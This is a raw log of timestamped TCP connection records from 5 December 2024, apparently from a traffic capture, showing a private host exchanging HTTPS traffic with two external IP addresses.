                                                                                                              Dec 5, 2024 10:38:16.017208099 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.017219067 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.017282009 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:16.017287016 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.017303944 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.017324924 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.017364025 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:16.017364025 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:16.053431034 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.053446054 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.053481102 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.053508997 CET4434972968.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.053525925 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:16.053620100 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:16.079587936 CET49729443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:16.665896893 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.667136908 CET49730443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:16.667165041 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.667845011 CET49730443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:16.667851925 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.671807051 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.672426939 CET49732443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:16.672458887 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.672823906 CET49732443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:16.672828913 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.673890114 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.674195051 CET49733443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:16.674226999 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.674479008 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.674747944 CET49733443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:16.674753904 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.674870014 CET49734443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:16.674879074 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:16.675232887 CET49734443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:16.675239086 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.103982925 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.104044914 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.104145050 CET49730443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.104324102 CET49730443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.104357004 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.104372025 CET49730443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.104377985 CET4434973013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.107031107 CET49737443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.107060909 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.107336044 CET49737443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.107419014 CET49737443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.107429981 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.110311985 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.110388041 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.110485077 CET49732443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.110559940 CET49732443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.110579014 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.110603094 CET49732443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.110609055 CET4434973213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.110826015 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.110878944 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.110946894 CET49734443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.110976934 CET49734443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.110981941 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.110992908 CET49734443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.110996008 CET4434973413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.111191034 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.111249924 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.111304998 CET49733443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.111342907 CET49733443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.111357927 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.111368895 CET49733443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.111375093 CET4434973313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.114300013 CET49739443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.114310980 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.114463091 CET49738443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.114483118 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.114502907 CET49739443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.114531994 CET49738443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.114655018 CET49738443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.114666939 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.114790916 CET49739443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.114803076 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.115318060 CET49740443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.115361929 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:17.115483046 CET49740443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.115634918 CET49740443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:17.115650892 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.201188087 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.203908920 CET49731443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.203954935 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.204549074 CET49731443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.204566002 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.637325048 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.637383938 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.637449026 CET49731443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.748332977 CET49731443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.748332977 CET49731443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.748372078 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.748389006 CET4434973113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.770531893 CET49741443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.770569086 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.770634890 CET49741443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.771730900 CET49741443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.771747112 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.825143099 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.825911999 CET49737443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.825922966 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.826617956 CET49737443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.826622963 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.831211090 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.831793070 CET49738443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.831845045 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.832259893 CET49738443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.832267046 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.834763050 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.834981918 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.835206985 CET49740443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.835259914 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.835340023 CET49739443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.835361958 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.835763931 CET49740443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.835774899 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:18.836030960 CET49739443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:18.836036921 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.262397051 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.262468100 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.262522936 CET49737443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.265470982 CET49737443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.265486956 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.265496969 CET49737443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.265502930 CET4434973713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.266228914 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.266288042 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.266372919 CET49738443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.269186020 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.269267082 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.269355059 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.269366980 CET49739443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.269423008 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.269474030 CET49740443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.272469044 CET49738443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.272496939 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.272514105 CET49738443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.272521019 CET4434973813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.273659945 CET49739443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.273669004 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.273684025 CET49739443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.273689032 CET4434973913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.273861885 CET49740443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.273861885 CET49740443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.273890972 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.273900986 CET4434974013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.285917997 CET49742443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.285953045 CET4434974213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.286051989 CET49742443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.288753033 CET49742443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.288779020 CET4434974213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.289575100 CET49743443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.289604902 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.289707899 CET49743443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.289824009 CET49743443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.289836884 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.291057110 CET49744443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.291079998 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.291155100 CET49744443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.291275024 CET49744443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.291286945 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.291480064 CET49745443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.291505098 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:19.291626930 CET49745443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.293042898 CET49745443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:19.293060064 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.487122059 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.488738060 CET49741443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:20.488758087 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.489506006 CET49741443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:20.489510059 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.921556950 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.921824932 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.922075033 CET49741443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:20.922157049 CET49741443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:20.922184944 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.922221899 CET49741443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:20.922236919 CET4434974113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.928787947 CET49747443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:20.928880930 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:20.928996086 CET49747443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:20.929388046 CET49747443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:20.929414034 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.003086090 CET4434974213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.005156040 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.006624937 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.007817030 CET49742443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.007817984 CET49742443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.007844925 CET4434974213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.007869959 CET4434974213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.008152962 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.008198977 CET49743443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.008220911 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.008759022 CET49745443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.008768082 CET49743443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.008771896 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.008778095 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.009411097 CET49745443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.009418011 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.009856939 CET49744443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.009881020 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.010283947 CET49744443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.010289907 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.203490973 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:21.203561068 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.207370996 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:21.229676008 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:21.229739904 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.438405037 CET4434974213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.438534021 CET4434974213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.438625097 CET49742443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.439575911 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.439655066 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.439711094 CET49743443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.440591097 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.440649986 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.440702915 CET49744443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.442490101 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.442549944 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.442615986 CET49745443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.444247961 CET49742443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.444284916 CET4434974213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.446305037 CET49743443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.446305037 CET49743443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.446329117 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.446340084 CET4434974313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.447443008 CET49744443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.447469950 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.447484016 CET49744443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.447490931 CET4434974413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.448421955 CET49745443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.448421955 CET49745443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.448465109 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.448477983 CET4434974513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.465615988 CET49749443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.465684891 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.465749025 CET49749443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.466392994 CET49749443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.466409922 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.467971087 CET49750443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.467998028 CET4434975013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.468105078 CET49750443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.468290091 CET49750443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.468303919 CET4434975013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.470339060 CET49751443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.470351934 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.470427990 CET49751443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.472062111 CET49752443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.472112894 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.472172022 CET49752443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.472300053 CET49751443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.472313881 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:21.473191977 CET49752443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:21.473208904 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:22.559648991 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:22.559755087 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:22.561059952 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:22.561072111 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:22.561716080 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:22.567852020 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:22.615339041 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:22.644500971 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:22.645230055 CET49747443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:22.645263910 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:22.646003008 CET49747443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:22.646012068 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.057068110 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.082649946 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.082726002 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.082809925 CET49747443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.083033085 CET49747443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.083069086 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.083084106 CET49747443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.083093882 CET4434974713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.086510897 CET49755443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.086556911 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.086644888 CET49755443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.086771011 CET49755443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.086787939 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.182435036 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.183026075 CET49749443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.183069944 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.183787107 CET49749443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.183794022 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.185322046 CET4434975013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.185897112 CET49750443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.185905933 CET4434975013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.186718941 CET49750443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.186723948 CET4434975013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.189451933 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.189796925 CET49751443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.189809084 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.190310001 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.190694094 CET49751443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.190700054 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.192154884 CET49752443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.192205906 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.192965031 CET49752443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.192970991 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.192987919 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.249325037 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.249341011 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.249372005 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.249385118 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.249399900 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.249402046 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.249432087 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.249448061 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.249485016 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.295555115 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.295571089 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.295604944 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.295612097 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.295634985 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.295706034 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.295717955 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.295756102 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.346409082 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.346426010 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.346470118 CET4434974868.66.226.116192.168.2.6
